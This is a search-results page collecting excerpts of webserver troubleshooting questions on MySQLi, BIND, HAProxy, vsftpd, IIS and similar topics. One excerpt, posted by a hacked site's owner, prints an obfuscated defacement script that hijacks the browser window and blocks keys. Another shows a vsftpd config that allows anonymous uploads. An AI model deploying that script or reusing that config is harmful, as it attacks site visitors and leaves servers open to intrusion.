Search Results

Search found 2349 results on 94 pages for 'webdev webserver'.

Page 12/94 | < Previous Page | 8 9 10 11 12 13 14 15 16 17 18 19  | Next Page >

  • Mysqli query only works on localhost, not webserver

    - by whamo
    Hello. I have changed some of my old queries to the Mysqli framework to improve performance. Everything works fine on localhost but when i upload it to the webserver it outputs nothing. After connecting I check for errors and there are none. I also checked the php modules installed and mysqli is enabled. I am certain that it creates a connection to the database as no errors are displayed. (when i changed the database name string it gave the error) There is no output from the query on the webserver, which looks like this: $mysqli = new mysqli("server", "user", "password"); if (mysqli_connect_errno()) { printf("Can't connect Errorcode: %s\n", mysqli_connect_error()); exit; } // Query used $query = "SELECT name FROM users WHERE id = ?"; if ($stmt = $mysqli->prepare("$query")) { // Specify parameters to replace '?' $stmt->bind_param("d", $id); $stmt->execute(); // bind variables to prepared statement $stmt->bind_result($_userName); while ($stmt->fetch()) { echo $_userName; } $stmt-close(); } } //close connection $mysqli-close(); As I said this code works perfectly on my localserver just not online. Checked the error logs and there is nothing so everything points to a good connection. All the tables exists as well etc. Anyone any ideas because this one has me stuck! Also, if i get this working, will all my other queries still work? Or will i need to make them use the mysqli framework as well? Thanks in advance.

    Read the article

  • JAVA - Download PDF file from Webserver

    - by Augusto Picciani
    I need to download a pdf file from a webserver to my pc and save it locally. I used Httpclient to connect to webserver and get the content body: HttpEntity entity=response.getEntity(); InputStream in=entity.getContent(); String stream = CharStreams.toString(new InputStreamReader(in)); int size=stream.length(); System.out.println("stringa html page LENGTH:"+stream.length()); System.out.println(stream); SaveToFile(stream); Then i save content in a file: //check CRLF (i don't know if i need to to this) String[] fix=stream.split("\r\n"); File file=new File("C:\\Users\\augusto\\Desktop\\progetti web\\test\\test2.pdf"); PrintWriter out = new PrintWriter(new FileWriter(file)); for (int i = 0; i < fix.length; i++) { out.print(fix[i]); out.print("\n"); } out.close(); I also tried to save a String content to file directly: OutputStream out=new FileOutputStream("pathPdfFile"); out.write(stream.getBytes()); out.close(); But the result is always the same: I can open pdf file but i can see white pages only. Does the mistake is around pdf stream and endstream charset encoding? Does pdf content between stream and endStream need to be manipulate in some others way?

    Read the article

  • What is the easiest way to have a local LAMP installation for web development on mac OS X ?

    - by pixeline
    I'm new to mac os x. In the Windows XP world, there are packages available, like easyPHP, wampserver, uniformserver, that enable you to have a local webserver complete with php, mysql configured via an automatic installer. Really handy. I need the same on my new mac. I know mac os x comes with a local webserver. Is this already with php, mysql preinstalled? I'd like to have you guys advise on the easiest way to have this local lamp so that i can continue developing on this nice and shiny machine. thanks!

    Read the article

  • SSH Chown problems

    - by Michael
    I have a webserver with multiple domain and user accounts setup. Recently I renamed one of the domain names and changed it's username correspondingly. However, this new user cannot access the data from the domain because it does not have the required permissions. How can I solve this problem? I've tried chown and I still cannot get access to the files. I have SSH root access and this is the only way I can actually move/touch the files but the webserver displays the file through another username which does not have access to the files. Thanks

    Read the article

  • Bind9 Debian Not responding

    - by Marc
    Im trying to set up a webserver with Bind9, apache2 on Debian 6. I am trying to learn to do it manualy so I do not have any control panels or anything just the command line. I have a domain name lets call it www.example.com I want a virtual host setup so that I can have multiple websites with different names on my server. I have ns1.example.com and ns2.example.com registered at my servers IP (123.456.789.12). Below is my Bind9 named.conf.options options { directory "/var/cache/bind"; // If there is a firewall between you and nameservers you want // to talk to, you may need to fix the firewall to allow multiple // ports to talk. See http://www.kb.cert.org/vuls/id/800113 // If your ISP provided one or more IP addresses for stable // nameservers, you probably want to use them as forwarders. // Uncomment the following block, and insert the addresses replacing // the all-0's placeholder. // forwarders { // 0.0.0.0; // }; auth-nxdomain no; # conform to RFC1035 listen-on-v6 { any; }; }; This is the default I'm not sure if i was supposed to edit it. I didn't. Here is my named.conf.default-zones: // prime the server with knowledge of the root servers zone "." { type hint; file "/etc/bind/db.root"; }; // be authoritative for the localhost forward and reverse zones, and for // broadcast zones as per RFC 1912 zone "localhost" { type master; file "/etc/bind/db.local"; }; zone "127.in-addr.arpa" { type master; file "/etc/bind/db.127"; }; zone "0.in-addr.arpa" { type master; file "/etc/bind/db.0"; }; zone "255.in-addr.arpa" { type master; file "/etc/bind/db.255"; }; zone "example.com.com" { type master; file "etc/bind/example.com.db"; }; named.conf.local Is an empty file with a comment saying to do local configuration here. example.com.db looks like this: ; BIND data file for mywebsite.com ; $ORIGIN example.com. $TTL 604800 @ IN SOA ns1.example.com. [email protected]. ( 2009120101 ; Serial 604800 ; Refresh 86400 ; Retry 2419200 ; Expire 604800 ) ; Negative Cache TTL ; IN NS ns1.example.com. IN NS ns2.example.com. IN MX 10 mail.example.com. localhost IN A 127.0.0.1 example.com. IN A 123.456.789.12 ns1 IN A 123.456.789.12 ns2 IN A 123.456.789.12 www IN A 123.456.789.12 ftp IN A 123.456.789.12 mail IN A 123.456.789.12 boards IN CNAME www These are all settings I've found from various tutorials. Now when i go to intodns I get: You should already know that your NS records at your nameservers are missing, so here it is again: ns1.example.com ns2.example.com Can someone help me? I'm not sure what Im doing wrong.

    Read the article

  • Duplicate GET request from multiple IPs - can anyone explain this?

    - by dwq
    We've seen a pattern in our webserver access logs which we're having problem explaining. A GET request appears in the access log which is a legitimate, but private, url as part of normal e-commerce website use (by private, we mean there is a unique key in a url form variable generated specifically for that customer session). Then a few seconds later we get hit with an identical request maybe 10-15 times within the space of a second. The duplicate requests are all from different IP addresses. The UserAgent for the duplicates are all the same (but different from the original request). The reverse DNS lookup on the IPs for all the duplicates requests resolve to the same large hosting company. Can anyone think of a scenario what would explain this? EDIT 1 Here's an example that's probably anonymised beyond being any actual use, but it might give an idea of the sort of pattern we're seeing (it's from a search query as they sometimes get duplicated too): xx.xx.xx.xx - - [21/Jun/2013:21:42:57 +0100] "GET /search.html?search=widget&Submit=Search HTTP/1.0" 200 5475 "http://www.ourdomain.com/index.html" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)" xx.xx.xx.xx - - [21/Jun/2013:21:43:03 +0100] "GET /search.html?search=widget&Submit=Search HTTP/1.0" 200 5475 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.91 Safari/534.30" xx.xx.xx.xx - - [21/Jun/2013:21:43:03 +0100] "GET /search.html?search=widget&Submit=Search HTTP/1.0" 200 5475 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.91 Safari/534.30" xx.xx.xx.xx - - [21/Jun/2013:21:43:04 +0100] "GET /search.html?search=widget&Submit=Search HTTP/1.0" 200 5475 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.91 Safari/534.30" xx.xx.xx.xx - - [21/Jun/2013:21:43:04 +0100] "GET /search.html?search=widget&Submit=Search HTTP/1.0" 200 5475 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.91 Safari/534.30" xx.xx.xx.xx - - [21/Jun/2013:21:43:04 +0100] "GET /search.html?search=widget&Submit=Search HTTP/1.0" 200 5475 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.91 Safari/534.30" xx.xx.xx.xx - - [21/Jun/2013:21:43:04 +0100] "GET /search.html?search=widget&Submit=Search HTTP/1.0" 200 5475 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.91 Safari/534.30" xx.xx.xx.xx - - [21/Jun/2013:21:43:04 +0100] "GET /search.html?search=widget&Submit=Search HTTP/1.0" 200 5475 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.91 Safari/534.30" xx.xx.xx.xx - - [21/Jun/2013:21:43:04 +0100] "GET /search.html?search=widget&Submit=Search HTTP/1.0" 200 5475 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.91 Safari/534.30" xx.xx.xx.xx - - [21/Jun/2013:21:43:04 +0100] "GET /search.html?search=widget&Submit=Search HTTP/1.0" 200 5475 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.91 Safari/534.30" xx.xx.xx.xx - - [21/Jun/2013:21:43:04 +0100] "GET /search.html?search=widget&Submit=Search HTTP/1.0" 200 5475 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.91 Safari/534.30" UPDATE 2 Sometimes it is part of a checkout flow that's duplicated to I'd think twitter is unlikely.

    Read the article

  • Getting ERR_DNS_FAIL when loading a local webserver page?

    - by NickA
    When I go to a page hosted on a machine on a local network, I get a "The page cannot be found" error with "ERR_DNS_FAIL" in the title. Any ideas what this is or why I am getting it on my computer? I've tried in Firefox, IE and Chrome. Other computers on the network load the page just fine. I'm pretty sure it is from the hostname. I am able to access the page if I browse to it using the IP of the machine. However, it has two hostnames and both are giving the ERR_DNS_FAIL error. I tried restarting the browsers or rebooting the machine, but neither helped. EDIT: ISSUE RESOLVED ON ITS OWN!

    Read the article

  • Configure APE-Server on Ubuntu10.10 webserver

    - by sadmicrowave
    I'm having problems configuring my ape-server. First, I reside behind a corporate firewall where our own DNS servers are maintained. I requested a domain name for my server and was provided uslonsweb003.us.mycompany.com from my IT group. Therefore, my website works and can be accessed via (intranet only) at http://uslonsweb003.us.mycompany.com/test.php. I followed the instructions at ape-project.org and run the Check Tool at the end only to find I get an error stating: Running test : Contacting APE Server (adding frequency) Can't contact APE Server. Please check the folowing url is pointing to your APE server : http://0.uslonsweb003.us.mycompany.com:6969 my /etc/apache2/apache2.conf module looks as follows: <VirtualHost *:80> Servername uslonsweb003.us.mycompany.com ServerAlias ape.uslonsweb003.us.mycompany.com ServerAlias *.ape.uslonsweb003.us.mycompany.com DocumentRoot "/var/www/" </VirtualHost> my /var/www/ape-jsf/Demos/config.js config section looks as follows: APE.Config.baseUrl = 'http://uslonsweb003.us.mycompany.com/ape-jsf'; APE.Config.domain = 'uslonsweb003.us.mycompany.com'; APE.Config.server = 'uslonsweb003.us.mycompany.com:6969'; The instructions at ape-project.org tell me that the APE.Config.server should be `ape.mydomain.com:6969'; but that does not work (I'm assuming because my corporate DNS does not understand the 'ape' before the domain name since 'ape' was not registered with the IT DNS). So therefore, I changed it to what you see above. Please help!! Thanks in advance UPDATE 1 per the installation instructions located on this page http://www.ape-project.org/wiki/index.php/Advanced_APE_configuration under 'Configure your Server/Computer' (I'm running it on a server obviously) It says I need to add some lines to my DNS config file. It sounds like (since I'm within a corporate network) I would ask my IT group to add the following lines to the DNS configuration file on their end: ape IN A x.x.x.x ; IP address of my APE server *.ape IN CNAME ape I just want to make sure this is all I have to have them add (or if this is even correct) before I ask them.

    Read the article

  • Webserver directory index: index.xml?

    - by Marius
    Hello there, I am making my first RSS-Feed, and I want to host it like this: www.example.com/rss/ I tried to name the xml-file "index.xml" and place it inside the directory, however, when I type http://www.example.com/rss/ i arrive at "Index of /rss" where the file is listed as being part of the directory, but it is not loaded automatically. What can be done about this? Thank you for your time. Kind regards, Marius

    Read the article

  • centos: nginx + thin webserver, incoming connections not allowed

    - by cbrulak
    I setup a fresh CentOS 5 install, compile nginx from scratch and am using thin as the rails server. If I visit the ip adress on the LAN: (for example) 1.2.3.4 I get the website not found error. However, I can ssh into the machine. If I use links to visit the ip address, I get the landing page. Any suggestions? Thanks EDIT I ran system-config-securitylevel and then was able to change the security settings to allow incoming connections.

    Read the article

  • Centos 6.3 vsftp unable to upload file to apache webserver

    - by user148648
    I am new to Centos, I did work with Sun Solaris and upload files to Apache web server before. I create an end user account and manage to ftp using command prompt to the server, error message is '226 Transfer Done (but failed to open directory). Content of my vsftpd.conf as below # Example config file /etc/vsftpd/vsftpd.conf # # The default compiled in settings are fairly paranoid. This sample file # loosens things up a bit, to make the ftp daemon more usable. # Please see vsftpd.conf.5 for all compiled in defaults. # # READ THIS: This example file is NOT an exhaustive list of vsftpd options. # Please read the vsftpd.conf.5 manual page to get a full idea of vsftpd's # capabilities. # # Allow anonymous FTP? (Beware - allowed by default if you comment this out). anonymous_enable=YES # ** may need to comment it back # # Uncomment this to allow local users to log in. local_enable=YES # # Uncomment this to enable any form of FTP write command. write_enable=YES # # Default umask for local users is 077. You may wish to change this to 022, # if your users expect that (022 is used by most other ftpd's) #local_umask=022 local_umask=077 # # Uncomment this to allow the anonymous FTP user to upload files. This only # has an effect if the above global write enable is activated. Also, you will # obviously need to create a directory writable by the FTP user. anon_upload_enable=YES # *** maybe to comment it back!!! # # Uncomment this if you want the anonymous FTP user to be able to create # new directories. anon_mkdir_write_enable=YES # ** may need to comment it back!!! # # Activate directory messages - messages given to remote users when they # go into a certain directory. dirmessage_enable=YES # # The target log file can be vsftpd_log_file or xferlog_file. # This depends on setting xferlog_std_format parameter xferlog_enable=YES # # Make sure PORT transfer connections originate from port 20 (ftp-data). connect_from_port_20=YES # # If you want, you can arrange for uploaded anonymous files to be owned by # a different user. Note! Using "root" for uploaded files is not # recommended! #chown_uploads=YES #chown_username=whoever # # The name of log file when xferlog_enable=YES and xferlog_std_format=YES # WARNING - changing this filename affects /etc/logrotate.d/vsftpd.log xferlog_file=/var/log/xferlog # # Switches between logging into vsftpd_log_file and xferlog_file files. # NO writes to vsftpd_log_file, YES to xferlog_file xferlog_std_format=YES # # You may change the default value for timing out an idle session. #idle_session_timeout=600 # # You may change the default value for timing out a data connection. #data_connection_timeout=120 # # It is recommended that you define on your system a unique user which the # ftp server can use as a totally isolated and unprivileged user. #nopriv_user=ftpsecure # # Enable this and the server will recognise asynchronous ABOR requests. Not # recommended for security (the code is non-trivial). Not enabling it, # however, may confuse older FTP clients. #async_abor_enable=YES # # By default the server will pretend to allow ASCII mode but in fact ignore # the request. Turn on the below options to have the server actually do ASCII # mangling on files when in ASCII mode. # Beware that on some FTP servers, ASCII support allows a denial of service # attack (DoS) via the command "SIZE /big/file" in ASCII mode. vsftpd # predicted this attack and has always been safe, reporting the size of the # raw file. # ASCII mangling is a horrible feature of the protocol. ascii_upload_enable=YES ascii_download_enable=YES # # You may fully customise the login banner string: ftpd_banner=Warning, only for authorize login. # # You may specify a file of disallowed anonymous e-mail addresses. Apparently # useful for combatting certain DoS attacks. #deny_email_enable=YES # (default follows) #banned_email_file=/etc/vsftpd/banned_emails # # You may specify an explicit list of local users to chroot() to their home # directory. If chroot_local_user is YES, then this list becomes a list of # users to NOT chroot(). chroot_local_user=YES chroot_list_enable=YES # (default follows) #chroot_list_file=/etc/vsftpd/chroot_list local_root=/var/www # # You may activate the "-R" option to the builtin ls. This is disabled by # default to avoid remote users being able to cause excessive I/O on large # sites. However, some broken FTP clients such as "ncftp" and "mirror" assume # the presence of the "-R" option, so there is a strong case for enabling it. ls_recurse_enable=YES # # When "listen" directive is enabled, vsftpd runs in standalone mode and # listens on IPv4 sockets. This directive cannot be used in conjunction # with the listen_ipv6 directive. listen=YES # # This directive enables listening on IPv6 sockets. To listen on IPv4 and IPv6 # sockets, you must run two copies of vsftpd with two configuration files. # Make sure, that one of the listen options is commented !! #listen_ipv6=YES pam_service_name=vsftpd userlist_enable=YES tcp_wrappers=YES

    Read the article

  • php info not effect when edit value in php.ini on nginx webserver

    - by khoanhd
    I've already installed php, fcgi, nginx, the system running as no problem, but the problem happen when: I update memory_limit in php.ini, then restart php-cgi, nginx, but when use phpinfo, theo memory_limit is not effected. I install 2 new extensions: curl and memcache, add 2 lines: extension=curl.so and extension=memcache.so, restart php-cgi and nginx, phpinfo also not show up the value curl and memcache in phpinfo. So, how should i do?Please help me.

    Read the article

  • My webserver just got hacked [closed]

    - by billmalarky
    Possible Duplicate: My server's been hacked EMERGENCY My web server just got hacked. It was on a vps so I think it was hacked through another site. When I loaded the homepage it looks like it ran some script. Can anyone tell me if this script is malicious and if I just got screwed by my own website? `<script>var _0x8ae2=["\x68\x74\x74\x70\x3A\x2F\x2F\x7A\x6F\x6E\x65\x2D\x68\x2E\x6F\x72\x67\x2F\x61\x72\x63\x68\x69\x76\x65\x2F\x6E\x6F\x74\x69\x66\x69\x65\x72\x3D\x54\x69\x47\x45\x52\x2D\x4D\x25\x34\x30\x54\x45","\x6F\x70\x65\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x7A\x6F\x6E\x65\x2D\x68\x2E\x6F\x72\x67\x2F\x61\x72\x63\x68\x69\x76\x65\x2F\x6E\x6F\x74\x69\x66\x69\x65\x72\x3D\x54\x69\x47\x45\x52\x2D\x4D\x25\x34\x30\x54\x45\x2F\x73\x70\x65\x63\x69\x61\x6C\x3D\x31","\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x6D\x67\x74\x66\x79\x2E\x63\x6F\x6D\x2F\x3F\x71\x3D\x48\x61\x63\x6B\x65\x64\x20\x62\x79\x20\x54\x69\x47\x45\x52\x2D\x4D\x25\x34\x30\x54\x45","\x73\x63\x72\x6F\x6C\x6C\x42\x79","\x74\x69\x74\x6C\x65","\x48\x61\x63\x6B\x65\x44\x20\x42\x79\x20\x54\x69\x47\x45\x52\x2D\x4D\x40\x54\x45","\x6F\x6E\x6B\x65\x79\x64\x6F\x77\x6E","\x72\x65\x73\x69\x7A\x65\x54\x6F","\x6D\x6F\x76\x65\x54\x6F","\x6D\x6F\x76\x65\x28\x29","\x72\x6F\x75\x6E\x64","\x66\x67\x43\x6F\x6C\x6F\x72","\x62\x67\x43\x6F\x6C\x6F\x72","\x4C\x4F\x4C","\x61\x76\x61\x69\x6C\x57\x69\x64\x74\x68","\x61\x76\x61\x69\x6C\x48\x65\x69\x67\x68\x74"];function details(){window[_0x8ae2[1]](_0x8ae2[0]);window[_0x8ae2[1]](_0x8ae2[2]);window[_0x8ae2[1]](_0x8ae2[3]);} ;window[_0x8ae2[4]](0,1);if(document[_0x8ae2[5]]==_0x8ae2[6]){function keypressed(){return false;} ;document[_0x8ae2[7]]=keypressed;window[_0x8ae2[8]](0,0);window[_0x8ae2[9]](0,0);setTimeout(_0x8ae2[10],2);var mxm=50;var mym=25;var mx=0;var my=0;var sv=50;var status=1;var szx=0;var szy=0;var c=255;var n=0;var sm=30;var cycle=2;var done=2;function move(){if(status==1){mxm=mxm/1.05;mym=mym/1.05;mx=mx+mxm;my=my-mym;mxm=mxm+(400-mx)/100;mym=mym-(300-my)/100;window[_0x8ae2[9]](mx,my);rmxm=Math[_0x8ae2[11]](mxm/10);rmym=Math[_0x8ae2[11]](mym/10);if(rmxm==0){if(rmym==0){status=2;} ;} ;} ;if(status==2){sv=sv/1.1;scrratio=1+1/3;mx=mx-sv*scrratio/2;my=my-sv/2;szx=szx+sv*scrratio;szy=szy+sv;window[_0x8ae2[9]](mx,my);window[_0x8ae2[8]](szx,szy);if(sv<0.1){status=3;} ;} ;if(status==3){document[_0x8ae2[12]]=0xffffFF;c=c-16;if(c<0){status=8;} ;} ;if(status==4){c=c+16;document[_0x8ae2[13]]=c*65536;document[_0x8ae2[12]]=(255-c)*65536;if(c>239){status=5;} ;} ;if(status==5){c=c-16;document[_0x8ae2[13]]=c*65536;document[_0x8ae2[12]]=(255-c)*65536;if(c<0){status=6;cycle=cycle-1;if(cycle>0){if(done==1){status=7;} else {status=4;} ;} ;} ;} ;if(status==6){document[_0x8ae2[5]]=_0x8ae2[14];alert(_0x8ae2[14]);cycle=2;status=4;done=1;} ;if(status==7){c=c+4;document[_0x8ae2[13]]=c*65536;document[_0x8ae2[12]]=(255-c)*65536;if(c>128){status=8;} ;} ;if(status==8){window[_0x8ae2[9]](0,0);sx=screen[_0x8ae2[15]];sy=screen[_0x8ae2[16]];window[_0x8ae2[8]](sx,sy);status=9;} ;var _0xceebx11=setTimeout(_0x8ae2[10],0.3);} ;} ;</script><body bgcolor="#000000" oncontextmenu="return false;"><p align="center"><span style="font-weight: 700;"><font face="Tahoma" size="5" color="#EEEEEE"><i>Server HackeD<br/><br/>By</i> </font><br/><br/><a href="#" class="name"><script>if (navigator.appName == 'Microsoft Internet Explorer'){document.write('<font face="Arial Black" size="5" color="#FF0000">');}else{document.write('<font face="Arial Black" size="5" color="black" style="text-shadow:#FFFFFF 2px 2px 5px">');}</script><i onclick="details()">TiGER-M@TE</i></font></a></span><br/><br/><script>var l1n3='<img src="data:image/gif;base64,R0lGODlhqAABAOYAAAMDA3d4eAAAAAICAfLy8l5dXaWlpSQlJBwcHBQVFBISEQ0NDbu7u/v8/EJBQePj4/3+/T4+PtjX2Do7OlZWVyEiIjc3N09PT4OEhIB/f/r6+sjIyMTExPb29rS0tHx7fOvr64+Pj4eHh56dnZqZmvT09GVlZejp6dXU1aGhoeXm5khISJKTk93e3hkZGQcHB0RFRBcXF+7u7isqKi4uLmxtbLe3t6ysrXR0dTQ0M87Ozw8QEMvLy6ipqQUFBUxMTAkJCdHS0vDw73BwcQsLCycnJ/j4+JeXl8HBwmFhYVNSU+Dg4Glpadvb2jEwML6+vrCvsB8fH4uLi1pZWgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAACoAAEAAAewgBANGkYdJQRCMiAnKg9LLU0SKEE6PBscSE8MNh5QNz0GKSMkRywhUiIYGR8BOEM1TCZJBVMUShc/KzAOERMWOU40M0UHFVEILjEJCjsLREAvPgADAgIDAD4vQEQLOwoJMS4IURUHRTM0TjkWExEOMCs/F0oUUwVJJkw1QzgBHxkYREgJweIIiREpDPS4AcWDDQZPkHDYwENHEBQSmrRY8kDFCRAyhBAo0cGIhgYQAgEAOw==" />'; document.write(l1n3+l1n3);`

    Read the article

  • Packet sniffing a webserver

    - by Shawn Mclean
    I have a homework in which I should explain how I would break into a server, retrieve a file and cover my tracks. My main question: is there a way to packet sniff a remote web server? Other information would be appreciated on covering tracks.

    Read the article

  • Getting started with webserver clustering.

    - by Ernie
    I work for a small ISP, and we host about 250 domains and all the stuff that goes along with that: DNS, mail, spam filtering, and backups. Currently, we have separate DNS servers (two of them) and mail servers (outgoing mail is actually on the secondary DNS server, but was previously on its own server). In the past, this was done as an insurance measure. The last thing we need is for some doofus (usually yours truly) to hose a server, taking out DNS and mail right along with it, or for spammers to jam our incoming SMTP server, preventing outgoing mail from being sent too. In the past, this was a problem, and our servers were set up the way they are now to combat it. However, clustering solutions like Sun's Cobalt RAQ (in days of olde) and Virtualmin appear to cater to an all-in-one approach, then deal with failures through redundant servers. I have avoided this thus far, but we've been using Virtualmin on our web server for a while now, and I'd like to expand into using it for a high availability cluster. Our networking partner has recently built a datacenter that has eliminated all of our other bugaboos like network, cooling, and power issues, so now the only thing left to go wrong is me hosing a server, which happened earlier this month. One of the bigger reasons we've avoided going this route is because our hardware requirements aren't particularly high. One server easily handles all the sites we host (most of them are flat sites). Also, load-balancing routers tend to be expensive and complicated. All that I'm really expecting to do is building a two-node cluster for redundancy so that when I hose a server (however rare that might be), we're not out for 8-12 hours while I rebuild it. What I need to know is how to get started, and if I'm really in a position to bother with this kind of thing at all.

    Read the article

  • Ubuntu VPS - email and webserver

    - by xZero
    I have a VPS based on Ubuntu, it has installed whole LAMP, everything needed for a web server and it works perfectly, but I'm still not able to configure it as a mail server.... I have configured MX record for my domain mail.mydomain.com and this part is OK, I also installed Postfix, Dovecot and Roundcube, configured it using this tutorial: http://ubuntuguide.org/wiki/Mail_Server_setup And after hours of configuring it doesn't work. I have experience with Linux and web hosting, but I successfully configured mail server once in past on Debian 6, and that with help from there. When I try to send email to me my gmail says: Technical details of permanent failure: Google tried to deliver your message, but it was rejected by the server for the recipient domain mydomain.com by dc147738a1117e4c12273.mydomain.com. [MY_SERVER_IP]. The error that the other server returned was: 554 5.7.1 <[email protected]>: Relay access denied Also I have Webmin control panel which works perfectly, how to configure postfix and dovecot from there? Thanks in advance.

    Read the article

  • HAProxy "503 Service Unavailable" for webserver running on a KVM virtual machine

    - by Menda
    I'm setting up a server with KVM (IP 192.168.0.100) and I have created inside of it one virtual machine using network bridging at 192.168.0.194. This virtual machine has an nginx instance running, which I can access from the server or from any computer computer in the internal network just typing in the browser http://192.168.0.194. However, I try configure HAProxy in the same server that hosts KVM and looking the status page of HAProxy it always shows the virtual machine as "DOWN". If I try from the server http://localhost, it should be the same than if I go to http://192.168.0.194. My goal is to build a reverse proxy, but I tried this little example and won't work. What am I doing bad? This is my config file in the server: # /etc/haproxy/haproxy.cfg global maxconn 4096 user haproxy group haproxy daemon defaults log global mode http option httplog option dontlognull retries 3 option redispatch maxconn 2000 contimeout 5000 clitimeout 50000 srvtimeout 50000 listen ServerStatus *:8081 mode http stats enable stats auth haproxy:haproxy listen Server *:80 mode http balance roundrobin cookie JSESSIONID prefix option httpclose option forwardfor option httpchk HEAD /check.txt HTTP/1.0 server mv1 192.168.0.194:80 cookie A check Thanks.

    Read the article

  • Exposing a WebServer behind a firewall without Port Forwarding

    - by pbreault
    We are deploying web applications in java using tomcat on client machines across the country. Once they are installed, we want to allow a remote access to these web applications through a central server, but we do not want our clients to have to open ports on their routers. Is there a way to tunnel the http traffic so that people connected to the central server can access the web applications that are behind a firewall ? The central server has a static ip address and we have full control over it. Right now, it is a windows box but it could be changed to a linux box if necessary. Our clients are running windows xp and up. We don't need to access the filesystem, we only want to access the web application through a browser. We have looked at reverse ssh tunneling but it shows scaling problem since every packet would have to pass through the central server.

    Read the article

  • How is a subdomain passed to the webserver?

    - by Joshua Frank
    I know that dns resolves an address like example.com to an IP address like 11.22.33.44, but I'm a little confused about how subdomains are resolved, so that when you type http://subdomain.example.com, what actually gets passed to the server at 11.22.33.44? In other words, example.com = 11.22.33.44, but subdomain.example.com/path = ??? Are "subdomain" and "path" passed as http headers, or mapped in the url in some way, or what? Thanks in advance. Edit: If I'm understanding correctly, BloodPhilia says that subdomain.example.com actually is a different domain that in principle could resolve to a totally different IP. But if that's so, then what about hosts that have huge numbers of (what look like) subdomains, but which actually map to some path on the site. For instance, blogspot hosts millions of blogs, and they all look like this: aaa.blogspot.com bbb.blogspot.com ...millions more... yyy.blogspot.com zzz.blogspot.com Those are clearly not subdomains with their own IP's, but rather some mapping like aaa.blogspot.com -- www.blogspot.com/aaa, but how is this accomplished? What actually gets passed to the web server at blogspot.com?

    Read the article

  • Webserver security, intrusion detection, and file intregrity

    - by enfield
    I would like to add some type of tracking / alerting on some linux webservers running PHP and Apache. In doing searches I have come across a lot of info from 2006-2009. Would like to revisit things and see what others are doing now. The main purpose here is to track when any files are changed and if so alert me somehow. The same goes for IDS and hopefully something that can reside on same server? Since some of these are small scale projects I would prefer opensource/free solutions that are really effective. Although I would still like to hear of other alternatives if someone has the experience and the cost can be justified.

    Read the article

  • Webserver max CPU when apache and MYSQL are ran together

    - by Tim
    This website has been running fine without issues, Recently it went down. After some investigation it looks like the combo of MYSQL and Apache bring the box to its knees. Apache can run find serving static web pages and MYSQL can run fine when the website isn't working. As soon as the website is enabled with SQL running the CPU on the box remains at 100%. Picture of the usage: http://i.stack.imgur.com/GG2NC.png I've checked the sql database for errors, tried tuning nearly every parameter in apache/sql's conf file for performance. The server is a redhat based box running the latest software packages. Any help/suggestions are welcome. Doing an strace on a high cpu apache process I see the following: read(14, "", 8192) = 0 close(14) = 0 socket(PF_FILE, SOCK_STREAM, 0) = 14 fcntl64(14, F_SETFL, O_RDONLY) = 0 fcntl64(14, F_GETFL) = 0x2 (flags O_RDWR) connect(14, {sa_family=AF_FILE, path="/var/lib/mysql/mysql.sock"...}, 110) = 0 setsockopt(14, SOL_SOCKET, SO_RCVTIMEO, "\2003\341\1\0\0\0\0", 8) = 0 setsockopt(14, SOL_SOCKET, SO_SNDTIMEO, "\2003\341\1\0\0\0\0", 8) = 0 setsockopt(14, SOL_IP, IP_TOS, [8], 4) = -1 EOPNOTSUPP (Operation not supported) setsockopt(14, SOL_SOCKET, SO_KEEPALIVE, [1], 4) = 0 Here is what I see from a mysql process: futex(0x86fc9a4, FUTEX_WAIT_PRIVATE, 39, NULL) = 0 futex(0x86fc734, FUTEX_WAIT_PRIVATE, 2, NULL) = 0 futex(0x86fc734, FUTEX_WAKE_PRIVATE, 1) = 0 gettimeofday({1301465020, 141613}, NULL) = 0 clock_gettime(CLOCK_REALTIME, {1301465020, 141699633}) = 0 futex(0x8707a64, FUTEX_WAIT_PRIVATE, 1, {4, 999913367}) = 0 futex(0x8707a40, FUTEX_WAIT_PRIVATE, 2, NULL) = 0 futex(0x8707a40, FUTEX_WAKE_PRIVATE, 1) = 0 exit_group(0) = ?

    Read the article

  • IIS WebServer CreatesNew file: OwnerShip?

    - by Beaud.
    IIS is configured for Integrated Windows Authentication. web.config is configured as follows: <authentication mode="Windows" /> <identity impersonate="true" /> We are Load balancing between \webserver1 and \webserver2. Windows Server 2003 \\webserverX creates a XML file to \\share1 and access is denied. We got pass through access denial by allowing Everyon to access the share... We would like to have the impersonated user to be the owner of the created file. Instead, \\webserver1's computer account is the owner. How can we make sure that the impersonated user has ownership of the file at creation time? PROGRESSION: I decided to create the file locally on \\webserver1's root directory. File's ownership is NETWORK SERVICES even if impersonate="true". I'm unable to change ownership of the file in C# code. Why when creating a file, IIS won't use the impersonated user's write permissions? If it actually does, what I am doing wrong?

    Read the article

